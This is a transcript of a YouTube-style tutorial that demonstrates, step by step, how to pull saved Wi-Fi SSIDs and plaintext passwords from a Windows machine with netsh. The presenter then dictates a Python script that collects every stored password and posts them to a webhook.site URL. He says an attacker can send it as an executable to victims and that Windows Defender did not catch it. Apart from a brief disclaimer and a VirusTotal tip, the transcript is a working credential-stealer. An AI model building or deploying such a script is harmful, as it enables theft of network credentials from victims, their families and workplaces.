Hello everyone, welcome to Learn with AQ. In today's video, we are diving into an eye-opening demonstration that shows how Wi-Fi SSIDs and passwords stored on a Windows machine can be extracted using a combination of command prompt, Python scripting, and webhooks. But before we begin, let me remind you that this tutorial is intended solely for educational purposes. Always use your skills responsibly and ensure you have proper authorization before testing or demonstrating these techniques. By understanding how attackers might exploit such methods, you'll be better equipped to secure your own systems and networks. So whether you are an aspiring ethical hacker, a cybersecurity enthusiast, or just curious about how things work under the hood, stick around. We'll break down the process step by step, starting from command prompt commands, followed by Python automation, and finally using webhooks for remote data retrieval. Ready to dive in? Let's get started. Alright guys, so we'll be starting from the command prompt. So it's very simple. I'm using actually Commander right now. You can download it from Google or any favorite browser you like. So or if you don't have Commander, you can simply just hit Windows R and type CMD and just write the commands over here. So actually I like more Commander, so I'm more comfortable with it. So but the command is are the same. So let's begin. First of all, we'll just extract all the Wi-Fi SSIDs from the command prompt. So just for your guys' knowledge, I'm sharing this WLAN show profiles, and now this command will actually enlist all the Wi-Fi passwords and Wi-Fi SSIDs stored on my laptop actually. So these are all the SSIDs and Wi-Fi which wherever I went to actually, whether it's my office, my home, or my cousin's house, or my brother's house, or my sister's house, or anywhere in my neighbors, or anywhere in my family, or even where I go, even in the coffee shops, or even if I went to a dentist like clinic and dental clinic and like this. So we have all these Wi-Fi stored in our CMDs in our command prompt in our Windows actually. So I will be showing you guys this one, Clifton A304, which is my home network actually. So let's grab this SSID's password. How we can extract it? It's simple. Let me clear the screen over here. Just write netsh wlan show profile name equals to it's Clifton. Make sure you write the correct cases like uppercase or lowercase if there are any, or special characters you write appropriately, and key equals to clears. Here key equals to clear shows the plain text password of this network. So I will hit enter over here, and I'm actually seeing all the information right now. You can see my SSID is name is Clifton A304. My Wi-Fi network name is this. As you can see, let me click on my Wi-Fi. As you can see, I'm connected right now to that network, and the password here you can see in the security section, the security settings. You can see key content, and here is my password. So this is the way you actually this is the way you can actually extract anyone's yeah, password. Basically, this is used by system administrators to grab and extract the SSID and the network passwords, and this is the basic thing. So how are we going to attack this thing? So we now know how where are the password are stored and how we can interact with the command prompt. Right now we can extract the this SSID and the password from for all the Wi-Fi's actually and pull the data, sensitive data out of it. So now what we'll do is we'll perform a write a Python script so we can automate this particular task. And since you know Python is a very strong programming language, so it can interact with the command prompt as well. and it can actually interact with the webhook, and it has a very vast library. So we'll be using two libraries in this thing. So let's get started in the Python section. So guys, we are right in the Python section. So before we get started in the Python scripting, we'll first check that we have installed which version we are using right now. I'm using Python 3.10 and point 8. I'm using this version, and I have successfully installed my Python. And next, what I need to do is I need to install some libraries before I get started. So pip install requests, and this is the library used for sending HTTP request, in this case a post request actually, in our case, which we'll be using for the webhook. So I have the requirement already satisfied, you can see. So if you don't have this thing installed, just write down pip install requests, and you'll have this library installed in on your Python.
So, right in the we are right now in the Visual Code editor. I have created a Wi-Fi hack.py file. So first, I'm importing the subprocess library. Import subprocess library. Uh, sorry, subprocess library. And this will allow us to run system commands directly from Python. We'll use this to interact with Windows networking commands. Next time importing import uh, requests. This is essential for making HTTP requests. We'll use it to send our collected data to a remote server, as we will be using webhook.site. So uh, next up, we'll define a function to run a command and return the output actually. So def run underscore command, and we'll pass the argument command over here, colon, and return subprocess dot run. So this will actually run the uh, command variable over here, and capture output true, comma, text true, and shell, sorry, comma, shell, I'm really sorry for that, shell true. Next, dot std out dot strip, and that's it. So over here, what's happening is actually uh, subprocess.run function runs the command, as you can see. Then capture underscore output captures the output so we can process it. Text equals to true ensures the output is in string format and not in bytes. Shell equals to true allows us to run command directly through the shell, which is necessary for Windows utilities like netsh command. Dot std out dot strip actually cleans up the output by removing any extra spaces or new line characters. Moving forward, next we'll be retrieving Wi-Fi profiles. So for Wi-Fi profiles, we'll be using profiles underscore output. We'll create a variable over here, profiles underscore output, run underscore command, and the command would be uh, netsh, as you guys already know. It's netsh, and wlan, comma, show, comma, and profiles. So over here, all the SSIDs, which are stored in this Windows operating system, will be enlisted actually. So profile underscore names equals to. So I'm going to actually uh, clean out this thing, like line dot split, and I'm going to split the lines with this semicolon, sorry, colon, and one. dot strip, and I'm going to strip the lines for line in profiles underscore output dot split lines, and if all user profiles all user profile in line. So over here, what's happening is actually we'll run the command function which will execute netsh wlan show profiles actually, and this commands will enlist all the saved Wi-Fi profiles on the system actually. So in the profiles underscore output. Next, we'll extract the profile names. Here I'm extracting the names of the profiles from the raw output. Uh, Let me break this down for you guys. Dot split lines converts the raw output into a list of lines actually, split lines. If all user profile in line filters out only the lines containing Wi-Fi profile information. Line dot split uh, bracket parenthesis colon one dot strip splits the line at the colon and extract the profile name, trimming any extra spaces like white spaces. So this will actually the result is listed called profile names, which contains all the Wi-Fi profile names stored on the machine. So next we will be uh, retrieve passwords for each profile over here. To retrieve each Wi-Fi passwords, we will be using Wi-Fi underscore info equals to uh, curly brackets. I'll be using the dictionary Wi-Fi actually for profile underscore name in profile names. So uh, profile underscore info equals to run underscore command. So to extract the passwords actually we have which command, netsh comma wlan comma show comma profile, sorry it will be in the double quotations actually, and profile underscore name. So it will loop it. So every time we find the the profile, it will replace this profile name which is stored in the profile underscore names. It will replace all one by one every profile, every SSID stored on the laptop on this Windows machine will be in this loop. So there is our command, key underscore content equals to I will leave this thing blank for line in profile underscore info dot split lines. All right, so it will split the lines if SSID name in line, and SSID equals to line dot split, and I will split this thing into colon actually, so it will be more clean. Strip, so no white spaces, no blank spaces. um lf lf and key content key content in line would be key underscore content variable equals to line dot split, and colon over here one dot strip, and next up we'll be storing all of these things into the dictionary variable, which is Wi-Fi info SSID equals to key underscore content. All right, so this is the loop actually. Now, what we are doing over here in all of this code actually, now we will be extracting all of the password each Wi-Fi profile. I've created an empty dictionary called Wi-Fi underscore info to store the profile names, SSID, and their passwords. Uh, we'll loop for each profile name using for loop. So for loop, we'll be using this, and uh, for each profile actually run netsh wlan show profile name key equals to clear command. Key equals to clear option tells Windows to display the safe password in the plain text actually. So inside the loop, I extract the SSID network name from lines containing SSID SSID name, and I extract the password from lines containing the key content. The key content. Uh, both are stored in the Wi-Fi info dictionary with SSID as key and password as a value, as you can see over here. So this is the loop actually. And next, we'll be preparing our webhook payload actually over here. So for the payload, let me add a variable payload equals to, it will be in the curly brackets, and profiles uh, colon and single quotation backslash n dot join, and round brackets and then square brackets, and in the square brackets I will be using f string actually. So backslash n SSID colon and curly brackets, and in this I will be calling SSID variable, and from here I'm going to add a new line for key content, actually key content colon curly brackets key underscore content. So it will display this, and new line. So every new SSID will be saved, will be in a separate line with SSID and key content. So it will be more easy to read actually. For I'm going to loop it again, key underscore content. I'm going to loop this thing so I get each and every Wi-Fi SSID and their passwords in plain text. So I've created the payload. Now I'm going to response equals to requests dot post, and over here in double quotations I will be entering the webhook site later in this video right now. So I will leave blank for the time being. Data equals to payload, and I'm going to hit enter over here. Print open this thing response dot text. So that's it. So for now, I need a webhook. For the webhook, I'm going to hit my browser actually. Let me enter the password for my browser. Okay, wrong entry. All right. So webhook.site. I'm going to enter webhook.site over here. And once in the webhook.site, they will give us a unique URL and waiting for the request. So I'll just click over here on this URL, and I'll head back to my code editor, and I'll paste that URL over here, and I will control S. I will save this file. Now to run this file, I'll be using my as commander actually, and for the commander, I'm using commander. You can use uh, whichever you like. So cd users desktop, as my file is saved in the desktop. Right now I'm going to enter this thing, and let's see what happens. I've executed my code. So there is an error line 22. Let's see. I hope this didn't get any of the response. There is an error in line number 22. So we'll check what's going on in our line number 22. Okay, as you can see, I've just misspelled this thing, items. I'm really made a mistake, just a typo, nothing much. So let me actually save this thing again and go to my uh, commander and let me execute my Python file again. I hope this time we'll grab the uh, code. The URL default configured this view in webhook.site. So let's see. As you can see, we got the response from the webhook actually, and as you can see in the profiles, I can see all of these Wi-Fi passwords. So I'm going to copy these thing and store it in my notepad. So as you can see, I have SSID with the Trion Institute and its key password over here, and Redmi Note 13 key content. Here's the password. Every every Wi-Fi which is stored on this laptop, along with their passwords, I have just extracted it. So a hacker, a malicious or a bad actor person can actually send you an executable file for this, and once you just double click on it, and all of your passwords, whether they're in your for your office, for your home network, for if you're ever visited your brother's house or your sister's house, each one of those passwords will be gone to that person. Even they can actually, this is actually dangerous for both of the person or their family members, or even for their where they are actually working. So this is really dangerous, and this is just for demonstration purposes only. So please don't try to use this thing as for illegal purposes. So to mitigate this thing, you need, before executing any file, you just need to go to virustotal.com, upload that file, executable file, to check whether that contains any malicious things or not. As you can see, Windows Defender did not detect anything over here, and it just sent all the data to the webhook, and the webhook gave all of these Wi-Fi passwords to the victim, to the attacker actually. So this is it. Stay safe, guys. Have a nice uh, day. And if you gain some knowledge from this video, please give this video a thumbs up, and do subscribe to my channel and share it with your friends and families to uh, educate themselves and secure them. Thank you so much. Stay blessed.